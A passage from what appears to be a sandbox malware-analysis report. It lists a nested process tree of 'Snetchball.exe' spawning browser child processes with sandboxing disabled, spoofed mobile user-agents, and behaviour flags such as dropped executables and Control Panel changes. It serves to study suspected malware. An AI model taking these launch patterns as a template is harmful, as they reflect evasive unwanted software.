                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 9; CPH1923) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2876 --field-trial-handle=2696,i,9726611169415515375,12609946107417687254,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                11⤵
                                • Executes dropped EXE
                                PID:8352
                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 9; CPH1923) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3012 --field-trial-handle=2696,i,9726611169415515375,12609946107417687254,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                11⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                PID:7776
                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 9; CPH1923) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3016 --field-trial-handle=2696,i,9726611169415515375,12609946107417687254,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                11⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                PID:7788
                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                  12⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Modifies Control Panel
                                  PID:9304
                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2668 --field-trial-handle=2672,i,13911154786115132299,12192655824397576251,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
                                    13⤵
                                    • Executes dropped EXE
                                    PID:9580
                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2792 --field-trial-handle=2672,i,13911154786115132299,12192655824397576251,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                    13⤵
                                    • Executes dropped EXE
                                    PID:9732
                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2804 --field-trial-handle=2672,i,13911154786115132299,12192655824397576251,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                    13⤵
                                    • Executes dropped EXE
                                    PID:9688
                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2932 --field-trial-handle=2672,i,13911154786115132299,12192655824397576251,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                    13⤵
                                    • Checks computer location settings
                                    PID:9764
                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2972 --field-trial-handle=2672,i,13911154786115132299,12192655824397576251,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                    13⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    PID:9772
                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                      14⤵
                                      • Checks computer location settings
                                      • Modifies Control Panel
                                      PID:10340
                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 16_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2676 --field-trial-handle=2680,i,15069512217567654245,4123764723657644115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
                                        15⤵
                                          PID:10064
                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 16_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2780 --field-trial-handle=2680,i,15069512217567654245,4123764723657644115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                          15⤵
                                            PID:9524
                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 16_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2784 --field-trial-handle=2680,i,15069512217567654245,4123764723657644115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                            15⤵
                                              PID:10820
                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 16_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2996 --field-trial-handle=2680,i,15069512217567654245,4123764723657644115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                              15⤵
                                              • Checks computer location settings
                                              PID:10412
                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 16_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3016 --field-trial-handle=2680,i,15069512217567654245,4123764723657644115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                              15⤵
                                              • Checks computer location settings
                                              PID:4568
                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                16⤵
                                                • Checks computer location settings
                                                • Modifies Control Panel
                                                PID:5780
                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2664 --field-trial-handle=2680,i,11024065314579049990,18347769865265885283,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
                                                  17⤵
                                                    PID:4952
                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2812 --field-trial-handle=2680,i,11024065314579049990,18347769865265885283,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                                    17⤵
                                                      PID:5676
                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2860 --field-trial-handle=2680,i,11024065314579049990,18347769865265885283,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                                      17⤵
                                                        PID:5572
                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2976 --field-trial-handle=2680,i,11024065314579049990,18347769865265885283,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                        17⤵
                                                        • Checks computer location settings
                                                        PID:1016
                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2984 --field-trial-handle=2680,i,11024065314579049990,18347769865265885283,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                        17⤵
                                                        • Checks computer location settings
                                                        PID:6244
                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1788 --field-trial-handle=2680,i,11024065314579049990,18347769865265885283,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                        17⤵
                                                        • Checks computer location settings
                                                        PID:6620
                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3752 --field-trial-handle=2680,i,11024065314579049990,18347769865265885283,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                        17⤵
                                                        • Checks computer location settings
                                                        PID:6672
                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                          18⤵
                                                          • Modifies Control Panel
                                                          PID:8148
                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                            19⤵
                                                            • Checks computer location settings
                                                            • Modifies Control Panel
                                                            PID:7336
                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2684 --field-trial-handle=2688,i,16965595885439478432,20949363754045926,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
                                                              20⤵
                                                                PID:7456
                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2960 --field-trial-handle=2688,i,16965595885439478432,20949363754045926,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                                                20⤵
                                                                  PID:7344
                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2964 --field-trial-handle=2688,i,16965595885439478432,20949363754045926,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                                                  20⤵
                                                                    PID:1736
                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2988 --field-trial-handle=2688,i,16965595885439478432,20949363754045926,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                    20⤵
                                                                    • Checks computer location settings
                                                                    PID:6428
                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=2688,i,16965595885439478432,20949363754045926,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                    20⤵
                                                                    • Checks computer location settings
                                                                    PID:7648
                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                      21⤵
                                                                      • Checks computer location settings
                                                                      • Drops file in Program Files directory
                                                                      • Modifies Control Panel
                                                                      PID:6056
                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2696 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
                                                                        22⤵
                                                                          PID:2136
                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2824 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                                                          22⤵
                                                                            PID:4812
                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2872 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                                                            22⤵
                                                                              PID:316
                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2992 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                              22⤵
                                                                              • Checks computer location settings
                                                                              PID:2780
                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3000 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                              22⤵
                                                                              • Checks computer location settings
                                                                              PID:5336
                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1200 --field-trial-handle=2700,i,3474452729815262469,2852195946909066718,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                                                                              22⤵
                                                                              • Checks computer location settings
                                                                              PID:10536
